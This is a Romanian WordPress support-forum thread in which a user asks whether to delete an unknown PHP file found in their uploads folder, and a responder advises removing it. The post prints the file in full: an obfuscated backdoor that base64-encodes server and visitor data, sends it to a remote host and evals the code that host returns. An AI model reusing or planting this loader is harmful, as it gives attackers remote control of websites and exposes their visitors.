• Rezolvat betzy

    (@betzy)


    azi m-am uitat prin directorul uploads și am găsit un fișier 217542.php
    l-am deschis și am găsit asta:
    <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="c7713a4edb05f4343028f578912775fc") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

    îl las acolo ?? sau îl șterg ?? io sigur nu l-am pus acolo

Vizualizare 2 răspunsuri - 1 la 2 (din 2 în total)
  • Îl ștergi, e un posibil exploit. Nu am idee ce anume face codul acela encodat base64, dar nu ar avea ce să caute acolo. Ceea ce nu înțeleg este cum anume a ajuns acolo, în mod normal fișierele PHP sunt interzise la upload în WordPress.

    Poate ar fi o idee bună să pui un tichet la host, având în vedere că există posibilitatea de upload în folderele remote cu permisiuni 755, bănuiesc eu. În folderul uploads și cele pe care le conține nu ar trebui să ai decât fișiere media și vreun index.php pentru a preveni browsing-ul prin foldere.

    Inițiator fir de discuții betzy

    (@betzy)

    poate a fost generat de ceva plugin sau ceva temă
    anyway acuma îl șterg

Vizualizare 2 răspunsuri - 1 la 2 (din 2 în total)
  • Subiectul „am găsit în uploads un fișier suspect” este închis pentru răspunsuri noi.